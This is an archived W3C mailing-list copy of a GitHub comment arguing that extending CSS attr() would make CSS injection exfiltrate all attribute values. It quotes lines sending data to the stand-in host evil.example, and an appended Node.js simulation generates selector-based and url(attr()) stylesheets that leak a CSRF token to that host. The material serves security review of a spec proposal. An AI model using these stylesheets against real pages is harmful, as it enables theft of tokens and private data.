
Re: [csswg-drafts] [css-values] Security concerns regarding attr() (#5092)

From: arturjanc via GitHub <sysbot+gh@w3.org>
Date: Fri, 29 May 2020 13:46:31 +0000
To: public-css-archive@w3.org
Message-ID: <issue_comment.created-635981234-1590759990-sysbot+gh@w3.org>
> As there's no ability to concatenate in CSS, these would become a relative URL resulting in a request to the server that supplied the HTML (or, perhaps, the stylesheet, depending on the outcome of #5079). So you couldn't send a request just anywhere.

That's a great illustration of the security issue this feature runs into: currently, browsers (at least Chrome and Firefox) resolve relative URLs based on the location of the stylesheet, not the loading document. So any CSS injection could just use `@import url(//evil.example)` and then in the malicious stylesheet exfiltrate the contents of all attributes on the page via `url(attr(secret))`, which would send requests to `evil.example/<attribute-value>`.

Currently, attackers can still query against the contents of attributes with CSS3 selectors, but that's a single-bit information leak, requiring thousands of requests (and recursively adding new stylesheets to the page) to exfiltrate something like a CSRF token. This makes such attacks more difficult to conduct in practice, and makes them more time-consuming, increasing the chance that a user would navigate away from the page before the attacker can leak the secret. Giving `attr()` more capabilities as proposed here would allow direct exfiltration of all attribute values on a page with a single injected stylesheet, substantially increasing the security impact of CSS injections.

I don't think disallowing this on certain elements is sufficient, given the large amount of data modern applications have in `data-*` attributes, URLs, and attributes on custom elements. The only safe solution I can think of would be to allowlist attributes such as `data-css-*`; of course existing use of `attr()` in the `content` property could be exempt from that.

GitHub Notification of comment by arturjanc
Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-635981234 using your GitHub account
Received on Friday, 29 May 2020 13:46:33 UTC
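As an added illustration (it is not part of the comment above, nor code from the CSS working group or any browser), the following Node.js script simulates the two exfiltration paths the comment contrasts: the existing one-bit-per-selector leak, where `[value^="..."]` attribute selectors are chained one stylesheet per leaked character, and the proposed `url(attr())` path, where relative-URL resolution against the attacker's stylesheet URL delivers the whole attribute value in a single request. The CSRF token, the `<input name="csrf">` target, the `evil.example` URLs and the `attr(value)` rule (the comment's `url(attr(secret))`, applied to that input) are all constructed for the example; a `startsWith()` check stands in for the browser's selector matching, and the `url(attr())` behaviour is the proposed feature, not what any shipped browser does.

```javascript
// Added example (not from the comment above): simulates the two CSS-injection
// exfiltration paths it describes, with no DOM and no network. A startsWith()
// check stands in for the browser's [value^="..."] selector matching, and a
// loop stands in for the attacker's server chaining one stylesheet per leaked
// character. All names, URLs and the token below are constructed for the example.

const HEX = '0123456789abcdef';                       // token alphabet (assumed)
const ATTACKER_CSS = 'https://evil.example/x.css';    // hypothetical attacker stylesheet
const SAMPLE_TOKEN = '3f9a7c21e0b4d685';              // constructed CSRF token value

// All the injected CSS itself needs to contain: an @import of the attacker's
// stylesheet, which the attacker can then regenerate server-side per round.
function buildInjectedPayload() {
  return `@import url(${ATTACKER_CSS});`;
}

// Existing CSS3 path: one rule per candidate next character, each with its own
// url(), plus an exact-match rule so the attacker learns when the value is
// complete. Each rule is a single yes/no test against the attribute value.
// Guesses are built from `alphabet` only, so no CSS string escaping is needed.
function buildPrefixStylesheet(knownPrefix, alphabet) {
  const rules = [];
  for (const c of alphabet) {
    const guess = knownPrefix + c;
    rules.push(`input[name="csrf"][value^="${guess}"]{background-image:url("https://evil.example/leak?p=${guess}")}`);
  }
  rules.push(`input[name="csrf"][value="${knownPrefix}"]{background-image:url("https://evil.example/leak?done=${knownPrefix}")}`);
  return rules.join('\n');
}

// Stand-in for the browser: a rule's url() is fetched only when its selector
// matches, which for [value^=".."] / [value=".."] is a prefix / equality test.
function fetchedUrls(stylesheet, attrValue) {
  const urls = [];
  for (const rule of stylesheet.split('\n')) {
    const m = rule.match(/\[value(\^?)="([^"]*)"\].*url\("([^"]+)"\)/);
    if (!m) continue;
    const [, op, needle, url] = m;
    if (op === '^' ? attrValue.startsWith(needle) : attrValue === needle) urls.push(url);
  }
  return urls;
}

// Stand-in for the attacker's server: each observed load reveals one character
// and decides the next stylesheet. Stops when the exact-match rule fires, or
// when no rule fires at all (a character outside the assumed alphabet).
function leakViaSelectors(attrValue, alphabet) {
  let known = '';
  const stats = { recovered: '', rounds: 0, leakRequests: 0, rulesServed: 0, stuck: false };
  for (;;) {
    stats.rounds += 1;
    stats.rulesServed += alphabet.length + 1;
    const hits = fetchedUrls(buildPrefixStylesheet(known, alphabet), attrValue);
    stats.leakRequests += hits.length;
    if (hits.some((u) => u.includes('?done='))) break;
    const hit = hits.find((u) => u.includes('?p='));
    if (!hit) { stats.stuck = true; break; }
    known = hit.split('?p=')[1];
  }
  stats.recovered = known;
  return stats;
}

// Proposed url(attr()) path: a single rule, and the attribute value resolves as
// a relative URL against the stylesheet's own URL (WHATWG URL resolution, the
// same algorithm browsers use), so the raw value reaches the attacker's host in
// one request, with no per-character rounds.
function buildAttrExfilStylesheet() {
  return 'input[name="csrf"]{background-image:url(attr(value))}';
}
function leakViaAttr(attrValue, stylesheetUrl = ATTACKER_CSS) {
  return new URL(attrValue, stylesheetUrl).href;
}

console.log(buildInjectedPayload());
console.log(leakViaSelectors(SAMPLE_TOKEN, HEX));
console.log(buildAttrExfilStylesheet(), '->', leakViaAttr(SAMPLE_TOKEN));
```

Run it with `node`. For the constructed 16-character token the selector path needs 17 chained stylesheets, serving 289 one-bit rules, to recover the value (and stops early on any character outside the alphabet the attacker guessed), whereas the `url(attr())` path is one rule and one request whose path is the token itself, `https://evil.example/3f9a7c21e0b4d685`. Which base URL relative `url()` values resolve against (the #5079 question in the quoted text) decides where that single request goes; the example uses the stylesheet's URL, which is the behaviour the comment describes for current Chrome and Firefox.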
